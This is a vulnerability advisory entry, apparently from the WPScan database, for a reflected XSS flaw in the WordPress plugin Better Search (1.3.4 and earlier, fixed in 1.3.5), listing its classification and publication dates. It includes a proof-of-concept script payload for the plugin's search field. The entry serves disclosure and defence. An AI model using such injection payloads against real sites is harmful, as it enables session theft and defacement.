Better Search <= 1.3.4 - Reflective XSS



Description
By submitting the JavaScript below to the search field Reflective Cross-Site Scripting (XSS) is possible.

<script>alert(String.fromCharCode(80, 97, 103, 101, 32, 118, 117, 108, 110, 101, 114, 97, 98, 108, 101, 32, 116, 111, 32, 114, 101, 102, 108, 101, 99, 116, 105, 118, 101, 32, 88, 83, 83))</script>

Affects Plugin

fixed in version 1.3.5

References

URL https://wordpress.org/plugins/better-search/changelog/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Juan Avila Reyes
Views 5358
Verified No
WPVDB ID 7725

Timeline

Publicly Published 2014-12-16 (over 5 years ago)
Added 2014-12-16 (over 5 years ago)
Last Updated 2019-10-21 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin